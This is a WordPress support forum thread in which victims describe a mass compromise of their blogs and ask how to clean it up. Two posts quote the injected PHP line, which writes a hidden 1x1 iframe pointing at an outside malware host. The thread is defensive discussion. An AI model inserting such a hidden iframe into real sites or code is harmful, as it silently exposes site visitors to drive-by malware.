Posted 4 years ago #
We recently had all (50+) wordpress blogs hacked in a single night where someone was able to add the following...
echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';?>?>
...to almost ever single file within the core files!
Other than manually removing the code from over 1,000 files, does anyone have a suggestion or encountered this themselves?
Posted 4 years ago #
There are a bunch of threads about similar attacks using iframes -- perhaps not this specific attacker, but sounds like the same sort of attack. Use the tags on the right and you will find threads that may be relevant.
Posted 4 years ago #
today same thing happend to my blog
what is the solution for that
i cant find any thing here
Posted 4 years ago #
Hi Friends I am also having the same problem, is there any solution for this problem
(echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';?>?>).
I just want to know the website hosting service provider of your site to check with my service provider. Can you let me known.
Posted 4 years ago #
guys any body say the solution instead of removing the code manually
Posted 4 years ago #
ashwin> right now no other option, except removing code, either manually or you can replace the files with your local copies.
Conversation is going on about this in this link -
http://wordpress.org/support/topic/173127
Post your further talks in the above link.
Posted 4 years ago #
this link might be useful - http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
the article is big, but read it to know it. it says that its the mpack server that does all this.
Posted 4 years ago #
Reporting Site infected with the iframe you talking about. I just discovered almost all the php files changed 29 april 2008... I removed all the entries but no guarantees it wont happend again...
The weird thing is that we had installed wordpress but we weren´t using it finally. More details: The server/hosting by "Arsys."
Good luck,
Antonio
This topic has been closed to new replies.
